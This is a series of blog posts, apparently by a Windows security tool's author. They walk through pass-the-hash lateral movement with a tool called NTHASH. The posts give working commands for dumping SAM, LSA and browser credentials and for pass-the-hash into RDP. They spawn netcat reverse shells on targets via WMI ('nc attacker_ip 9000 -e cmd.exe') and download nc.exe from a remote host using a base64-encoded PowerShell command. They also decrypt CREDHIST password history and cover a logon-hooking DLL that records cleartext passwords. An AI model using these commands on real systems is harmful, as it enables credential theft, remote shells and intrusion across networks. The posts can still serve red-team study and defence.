Résultats de recherche : nthash

Oct 292019
 

Last one on the « pass the hash » series.
Initially we used a remote RDP console.
We then demonstrated netcat reverse shell.
What if we dont have RDP or cant/dont want to use netcat to the remote target?

WinRM to the rescue !

1.Ensure WinRM is set on the attacker host : winrm quickconfig

2.Add trusted hosts * (or filter to an ip) on attacker host : powershell « Set-Item WSMan:\localhost\Client\TrustedHosts -Value « * » -Force »

3.Enable psremoting on the remote target host (use wmic / see previous article) : powershell.exe « enable-psremoting -force »

4.Add trusted hosts * (or filter to an ip) on attacker host : powershell « Set-Item WSMan:\localhost\Client\TrustedHosts -Value « * » -Force » (use wmic / see previous article)

5.Enjoy a remote shell under powershell (from the attacker host) : Enter-PSSession -ComputerName target

Oct 292019
 

In previous article, we have introduced the used of WMIC in a « pass the hash » shell.

See below a list of useful wmic commands of gathered around the internet:

rem remember impersonate is ok but delegate is not

rem become familiar with the available aliases
wmic alias list brief
rem see the available methods for any class
wmic [class] call /?

rem file stuff
wmic /node:target DATAFILE where « drive=’c:’ AND path=’\\windows\\' » GET Name,readable,size
wmic /node:target datafile « c:\\temp\\test.txt » call rename c:\temp\abc.txt
wmic /node:target datafile « c:\\temp\\test.txt » call copy c:\temp\abc.txt

rem process stuff
wmic /node:target process call create « nc attacker-ip 9000 -e cmd.exe »
wmic /node:target process call create « cmd.exe /c echo test > c:\temp\test.txt »
wmic /node:target process where name= »explorer.exe » call terminate
wmic /node:target process where processid= »1234″ call terminate
wmic /node:target process get name, processid

rem users and groups stuff
WMIC /node:target USERACCOUNT LIST brief
wmic /node:target path Win32_GroupUser

Oct 292019
 

lets again introduce a variant of previous article.

Ideally we would be using the windows built in wmic command rather that the nthash runwmi verb.

Unfortunately, wmic can be a pita with escaping characters in some situations, especially when combining with powershell.

The below for instance wont work because of the ‘,’ comma character.

wmic /node:target process call create « powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http://erwan.labalec.fr/uploads/nc.exe’,’c:\temp\nc.exe’) »

The trick/workaround is to base64encode (unicode) the powershell command.

NTHASH-win64.exe /base64encodew /input:(New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);

Which will give you the following :

KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQ
BiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA=

You can then execute a powershell command on a remote target using wmic like below :

wmic /node:target process call create « powershell.exe -encodedcommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA= »

Oct 292019
 

This time, lets introduce a variant of previous article.

Rather than copying a file to a target using a remote admin$ share (which is not always available), lets have the target download a file via http.

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

2.download a file from internet on a remote target

(remember, you are using a pth shell with proper logon details).

NTHASH-win64.exe /runwmi /server:target /binary:powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);

Notice the %2f in place of the ‘/’ – Indeed, we need to escape this as otherwise it would be understood as command line parameter.

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:c:\temp\nc.exe attacker_ip 9000 -e cmd.exe

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.

 

Oct 282019
 

In a previous article, we have seen how to perform lateral movement thru « Pass The Hash ».

Lets imagine that there is no RDP server available on the target but you still need to get a shell on the target.

Lets use a reverse shell i.e the target will connect back to us (the attacker).

Usefull as well if the firewall on the target is allowing only outbound connections.

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

2.Copy file to target host (remember, you are using a pth shell with proper logon details).
copy nc.exe \\target\admin$

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:nc attacker_ip 9000 -e cmd.exe

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.

Oct 282019
 

Following previous article on NTHASH, lets see how to perform lateral movement using « pass the hash » (pth).

In 3 steps, lets retrieve some hashes and then lets perform a PTH (using MS RDP client).

1.Retrieve the hash
NTHASH-win64.exe /dumpsam
or
NTHASH-win64.exe /dumphashes /system
or
reg save hklm\sam sam.sav and reg save hklm\system system.sav
NTHASH-win64.exe /dumphashes /offline
or (in a domain env)
NTHASH-win64.exe /logonpasswords

2.Pass the hash
NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.

3.In the newly opened cmd « pth » shell, type mstsc /restrictedadmin /v:target

You will end up logged as the « username » account in a RDP console on server named « target ».

Try a simple whoami for fun and go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.

And you never had to enter the « username » password…

Note that any other client tool (preferably built in windows) that inherit ntlm credentials from current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc)

This will be covered in future articles.

Oct 282019
 

Dont ask about the name : yes it does not mean much but this is all I got so far…

A tribute to https://github.com/gentilkiwi/mimikatz
And generally speaking a tool to handle windows passwords and perform lateral movement.
https://attack.mitre.org/matrices/enterprise/windows/ is definitely worth reading as well.

Source code on github here.

Command line so far:

Command line as below:
NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx
NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx
NTHASH /gethash /password:password
NTHASH /getsid /user:username [/server:hostname]
NTHASH /getusers [/server:hostname]
NTHASH /getdomains [/server:hostname
NTHASH /dumpsam
NTHASH /dumphashes [/offline]
NTHASH /dumphash /rid:123 [/offline]
NTHASH /getsamkey [/offline]
NTHASH /getsyskey [/offline]
NTHASH /getlsakeys
NTHASH /wdigest
NTHASH /logonpasswords
NTHASH /pth /user:username /password:myhash /domain:mydomain
NTHASH /enumcred
NTHASH /enumcred2
NTHASH /enumvault
NTHASH /chrome [/binary:path_to_database]
NTHASH /firefox [/binary:path_to_database]
NTHASH /cryptunprotectdata /binary:filename
NTHASH /cryptunprotectdata /input:string
NTHASH /cryptprotectdata /input:string
NTHASH /runasuser /user:username /password:password [/binary: x:\folder\bin.exe]
NTHASH /runastoken /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runaschild /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH /runas [/binary: x:\folder\bin.exe]
NTHASH /runts /user:session_id [/binary: x:\folder\bin.exe]
NTHASH /runwmi /binary:c:\folder\bin.exe [/server:hostname]
NTHASH /enumpriv
NTHASH /dumpprocess /pid:12345
NTHASH /bytetostring /input:hexabytes
NTHASH /stringtobyte /input:string
NTHASH /base64encodew /input:string
NTHASH /base64encode /input:string
NTHASH /base64decode /input:base64string
NTHASH /a_command /verbose
NTHASH /a_command /system

Jan 242021
 

Every time that you change the login password on your system, Windows stores the hashes of the previous password in the CREDHIST file (Located in %appdata%\Microsoft\Protect\CREDHIST ).

Lets play with the credhist file and NTHASH then.

Setup:
-User test created with Password1
-I then logged in and changed password twice to Password2, then Password3.

***********************
I retrieved credhist file for that user, took it offline, then ran the below:
nthash-win64 /decodecredhist /binary:.\credhist-test.

The contains 2 entries (everytime I changed password,i.e twice).

*********************

Decryption is based on a hmac key generated from the sha1 password + the user SID.

Lets get the SHA1 of the current user password (the user SID is known in the credhist file).

NTHASH-win64.exe /widestringtohexa /input:Password3 | NTHASH-win64.exe /gethash /mode:SHA1
NTHASH 1.8 x64 by erwan2212@gmail.com
gethash
31F8F4DFCB16205363B35055EBE92A75F0A19CE3

**********************************
Now lets decrypt last credhist entry i.e #1.

nthash-win64 /decodecredhist /binary:.\credhist-test /password:31F8F4DFCB16205363B35055EBE92A75F0A19CE3 /key:1

I get
SHA1:2277C28035275149D01A8DE530CC13B74F59EDFB
NTLM:C39F2BEB3D2EC06A62CB887FB391DEE0

This is sha1/ntlm for Password2.
**********************************
Now lets decrypt previous (and first) entry i.e #0.

nthash-win64 /decodecredhist /binary:.\credhist-test /password:2277C28035275149D01A8DE530CC13B74F59EDFB /key:0

SHA1:CBA4E545B7EC918129725154B29F055E4CD5AEA8
NTLM:64F12CDDAA88057E06A81B54E73B949B

This is sha1/ntlm for Password1.

**********************************

That’s it : we have seen the logic behing this credhist file and how to decrypt it.

Août 162020
 

In previous articles, we have seen that hashed passwords are as good as clear text passwords.

Thus, sometimes, it is nice to retrieve passwords at once in clear text.
Under windows, you can register a network provider which will be called every time a user logs on.
And the beauty of it is that it the credential manager will pass on the username and password in clear text.
Of course, you need to be a local admin to do so : we not talking escalation here but pivoting/lateral movement.

You need to implement 2 functions in your dll, nicely documented by Microsoft here and here.

Once done, you can do pretty much what you want with the data.

I am providing an example here (source code and binary) which will log to a text file the username/password.
setup.cmd will register the dll for you : no reboot needed – next logon will be logged.